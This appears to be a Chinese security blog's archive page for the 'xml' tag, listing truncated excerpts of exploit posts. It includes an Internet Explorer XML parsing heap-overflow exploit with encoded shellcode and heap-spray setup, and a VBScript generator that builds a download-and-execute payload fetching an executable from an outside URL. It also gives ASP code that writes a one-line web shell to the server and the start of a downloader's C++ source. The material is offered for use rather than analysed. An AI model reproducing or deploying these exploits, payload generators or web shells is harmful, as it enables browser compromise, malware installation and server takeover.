标签 ‘xml’ 下的日志

MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)

<!–

IE XML Heap Corruption exploit

by krafty

greets to hdm, ddz, SK, muts, halvar, grugq, and all the ethnical hackers

sux to exploit traders – ZDI, WabiSabiLabi, and all you h0arders.

Bring back the days of technotronic and r00tshell! Freedom.

poc: launches calculator.
Tested with IE7 XP SP2, SP3, Vista.

–>
阅读全文 »

Tags: , ,

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day 网马生成器

作者:lcx

‘code by lcx

On Error Resume Next
Exeurl = InputBox( “请输入exe的地址:”, “输入”, “http://www.haiyangtop.net/333.exe” )
url=”http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL=”&URLEncoding(Exeurl)&”&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload”
阅读全文 »

Tags: , , , ,

MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day

// k`sOSe 12/10/2008 – tested on winxp sp3, explorer 7.0.5730.13

// windows/exec – 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:WINDOWSsystem32calc.exe

http://milw0rm.com/sploits/2008-iesploit.tar.gz

# milw0rm.com [2008-12-10]

Tags: , , ,

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

<html>
<script>

	// k`sOSe 12/10/2008
	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
 	// Heap spray address adjusted for Vista - muts / offensive-security.com
	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
	// http://www.offensive-security.com/0day/iesploit-vista.rar
	// windows/exec - 141 bytes
	// http://www.metasploit.com
	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  	var block = unescape("%u0c0c%u0c0c");
	var nops = unescape("%u9090%u9090%u9090");
 阅读全文 »
Tags: , , ,

xml下载者VC源码

作者:CoolDiyer
来源:红狼

// xml.cpp : By CoolDiyer 2008/4/9 14:03 
//
#pragma comment(linker, "/subsystem:windows /FILEALIGN:0x200 /opt:nowin98")

#include <windows.h>
#include <atlbase.h>
#import "msxml.dll"
 阅读全文 »
Tags: ,

xml写马

来源:WEB安全手册|Trace's Space

<%
set xmldoc = Server.CreateObject("Msxml2.DOMDocument.3.0")
xmldoc.loadXml("<p></p>")
xmldoc.documentElement.appendChild xmldoc.createComment("<"+"% execute(request(chr(35))) %"+ ">")
xmldoc.save(server.mappath("sample.asp"))
Response.Redirect "sample.asp"
%>

Tags:

Injecting the script tag into XML

鬼仔:这几天一直在玩游戏,更新不及时。抱歉。

来源:Ph4nt0m Google Group

http://www.thespanner.co.uk/2007/10/09/injecting-the-script-tag-into-xml/

Firefox is now the browser I like hacking, there’s just so much stuff it
can do. I simply don’t have enough time to explore everything, but what I
have found was some very interesting XML behavior. I was helping Ronald
<http://www.0x000000.com/> 阅读全文 »

Tags:

XML木马研究

文章来源:黑客防线VIP文章区

这几天一直在学XML,忽然看到了xmlDoc中有一个.SAVE方法,我们就可以在没有FSO的机子上写ASP木马了。
FSO(FileSystemObject)是微软ASP的一个对文件操作的控件,不过好多的个人服务器都不支持或改名了,我们只可以望而生悲了。
首先了解一下XML需要的系统是WINDOWS 2000以上,也就是说我们不必在系统上安装XML parser解析也可以支持XML了。我们狂笑吧,在也不怕服务器上的FSO被改名了。
首先我们介绍一下HTML与XML代码的规范化
1.所有的XML文档必须有一个结束标记
在XML文档中, 忽略结束标记是不符合规定的。
在HTML文档中,一些元素可以是没有结束标记的。下面的代码在HTML中是完全合法的:
阅读全文 »

Tags: